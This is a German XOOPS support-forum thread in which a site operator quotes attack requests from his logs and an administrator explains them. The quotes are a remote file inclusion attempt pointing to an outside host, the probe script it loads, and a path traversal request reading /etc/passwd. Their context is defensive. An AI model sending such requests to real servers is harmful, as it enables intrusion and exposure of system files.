MyXoops Forum

Aw:: SQL-Injection - Interpretation? [Sicherheit von XOOPS] - myXOOPS German Support

  1. Board-Index
  2. Allgemeines Forum
  3. Sicherheit von XOOPS
  4. [Anfrage] SQL-Injection - Interpretation?
Anmelden

alfred

Administrator
Gepostet am:11.12.2009 18:52
alfred
alfred Offline (Show more)
Administrator
Posts: 7619
Since: 06.12.2004
#2

Aw:: SQL-Injection - Interpretation?

11.12.2009 18:52 Zitat:

frankblack schrieb:
Frage A: itemid wird mit intval behandelt. Reicht das?


Kommt drauf an, für den fall sollte das reichen
(Rückgabe ist dann eben 0)

Zitat:
Frage B: Hat Protector diesen Angriff abgewehrt? Ich habe bei Protector immer ein flaues Gefühl, weil die Meldungen nicht besonders aussagekräftig sind.


Naja abgewehrt sicher nicht, der hat hat das registriert.
Es kommt nun drauf an was du in den Voreinstellungen stehen hast (weisse Seite etc.)

Zitat:
Hmmm, da scheint nur jemand wild am Spekulieren zu sein, siehe auch:


nein, das sind Scripte, die alle möglichen Varianten durchtesten

frankblack

"myXOOPs"-Profi
Gepostet am:11.12.2009 15:45
frankblack
frankblack Offline (Show more)
"myXOOPs"-Profi
Posts: 747
Since: 19.04.2006
#1

SQL-Injection - Interpretation?

11.12.2009 15:45 Ich beobachte seit ein paar Tagen folgende Anfragen in Protector und in den Server-Logs:
GET /artikel/item.php?itemid=372///?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/one.txt???
Der Code in dieser Textdatei sieht folgendermaßen aus:
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
Frage A: itemid wird mit intval behandelt. Reicht das? Frage B: Hat Protector diesen Angriff abgewehrt? Ich habe bei Protector immer ein flaues Gefühl, weil die Meldungen nicht besonders aussagekräftig sind. Hmmm, da scheint nur jemand wild am Spekulieren zu sein, siehe auch:
GET //phplists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
oder doch nicht?
... is gone with the wind ...
Diesen Thread durchsuchen:  1 Anonyme Benutzer

Aktuell aus dem Forum

Forum Thema Antworten Views Letzter Beitrag
OffOffTopic [Wichtig] Übernahme myXOOPS 0 604 11.12.2023 18:57
alfred Gehe zum letzten Beitrag
Die Installation und Administration von XOOPS 2.5.X [Offen] Upgrade 2.5.11 3 2355 07.05.2023 07:03
Goffy Gehe zum letzten Beitrag
Posts | Themen | Foren